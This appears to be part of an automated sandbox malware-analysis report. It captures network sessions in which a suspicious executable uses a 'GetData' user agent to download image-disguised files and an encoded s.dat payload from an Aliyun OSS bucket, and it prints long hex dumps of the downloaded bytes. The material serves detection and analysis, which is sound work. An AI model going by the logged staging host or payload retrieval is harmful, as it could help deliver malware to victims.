                                                                                      Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJ


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.44973959.110.190.444437572C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 00:52:58 UTC111OUTGET /c.gif HTTP/1.1
                                                                                      User-Agent: GetData
                                                                                      Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                                                                      Cache-Control: no-cache
                                                                                      2025-01-09 00:52:59 UTC546INHTTP/1.1 200 OK
                                                                                      Server: AliyunOSS
                                                                                      Date: Thu, 09 Jan 2025 00:52:59 GMT
                                                                                      Content-Type: image/gif
                                                                                      Content-Length: 10681
                                                                                      Connection: close
                                                                                      x-oss-request-id: 677F1DEBA645AE353698D08E
                                                                                      Accept-Ranges: bytes
                                                                                      ETag: "10A818386411EE834D99AE6B7B68BE71"
                                                                                      Last-Modified: Wed, 08 Jan 2025 11:04:15 GMT
                                                                                      x-oss-object-type: Normal
                                                                                      x-oss-hash-crc64ecma: 10287299869673359293
                                                                                      x-oss-storage-class: Standard
                                                                                      x-oss-ec: 0048-00000104
                                                                                      Content-Disposition: attachment
                                                                                      x-oss-force-download: true
                                                                                      Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                                                                      x-oss-server-time: 15
                                                                                      2025-01-09 00:52:59 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                                      Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                                      2025-01-09 00:52:59 UTC4096INData Raw: 4d cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66
                                                                                      Data Ascii: MbZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf
                                                                                      2025-01-09 00:52:59 UTC3035INData Raw: 0f 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0
                                                                                      Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.44974059.110.190.444437572C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 00:53:00 UTC111OUTGET /d.gif HTTP/1.1
                                                                                      User-Agent: GetData
                                                                                      Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                                                                      Cache-Control: no-cache
                                                                                      2025-01-09 00:53:00 UTC547INHTTP/1.1 200 OK
                                                                                      Server: AliyunOSS
                                                                                      Date: Thu, 09 Jan 2025 00:53:00 GMT
                                                                                      Content-Type: image/gif
                                                                                      Content-Length: 3892010
                                                                                      Connection: close
                                                                                      x-oss-request-id: 677F1DEC7FFDC235383FCA93
                                                                                      Accept-Ranges: bytes
                                                                                      ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                                                                      Last-Modified: Wed, 08 Jan 2025 11:04:19 GMT
                                                                                      x-oss-object-type: Normal
                                                                                      x-oss-hash-crc64ecma: 3363616613234190325
                                                                                      x-oss-storage-class: Standard
                                                                                      x-oss-ec: 0048-00000104
                                                                                      Content-Disposition: attachment
                                                                                      x-oss-force-download: true
                                                                                      Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                                                                      x-oss-server-time: 15
                                                                                      2025-01-09 00:53:00 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                                      Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                                      2025-01-09 00:53:00 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                                                                      Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                                                                      2025-01-09 00:53:00 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                                                                      Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                                                                      2025-01-09 00:53:00 UTC4096INData Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95
                                                                                      Data Ascii: -J;wuwu{}uG`uWu{Q6
                                                                                      2025-01-09 00:53:00 UTC4096INData Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33
                                                                                      Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v|}ThkcJ{K-{u)%|!Q;b:Bmyv)B0.xfcI9a/}pb"3
                                                                                      2025-01-09 00:53:00 UTC4096INData Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50
                                                                                      Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
                                                                                      2025-01-09 00:53:00 UTC4096INData Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79
                                                                                      Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
                                                                                      2025-01-09 00:53:00 UTC4096INData Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4
                                                                                      Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
                                                                                      2025-01-09 00:53:00 UTC4096INData Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7
                                                                                      Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
                                                                                      2025-01-09 00:53:00 UTC4096INData Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64
                                                                                      Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.44974259.110.190.444437572C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 00:53:09 UTC111OUTGET /s.dat HTTP/1.1
                                                                                      User-Agent: GetData
                                                                                      Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                                                                      Cache-Control: no-cache
                                                                                      2025-01-09 00:53:09 UTC560INHTTP/1.1 200 OK
                                                                                      Server: AliyunOSS
                                                                                      Date: Thu, 09 Jan 2025 00:53:09 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 28272
                                                                                      Connection: close
                                                                                      x-oss-request-id: 677F1DF59F27CB35357018E8
                                                                                      Accept-Ranges: bytes
                                                                                      ETag: "6F93B0260C6726714C31FF7CCA6EDFCB"
                                                                                      Last-Modified: Thu, 09 Jan 2025 00:53:00 GMT
                                                                                      x-oss-object-type: Normal
                                                                                      x-oss-hash-crc64ecma: 9194647615507018268
                                                                                      x-oss-storage-class: Standard
                                                                                      x-oss-ec: 0048-00000113
                                                                                      Content-Disposition: attachment
                                                                                      x-oss-force-download: true
                                                                                      Content-MD5: b5OwJgxnJnFMMf98ym7fyw==
                                                                                      x-oss-server-time: 17
                                                                                      2025-01-09 00:53:09 UTC3536INData Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40
                                                                                      Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
                                                                                      2025-01-09 00:53:09 UTC4096INData Raw: 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86
                                                                                      Data Ascii: _##V'3+f*~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{*m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
                                                                                      2025-01-09 00:53:09 UTC4096INData Raw: 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc
                                                                                      Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
                                                                                      2025-01-09 00:53:09 UTC4096INData Raw: 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41
                                                                                      Data Ascii: 0JY9sEAOyv1|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4|4%A}bkkkkEv|sJ"KKKKD\@NKSA
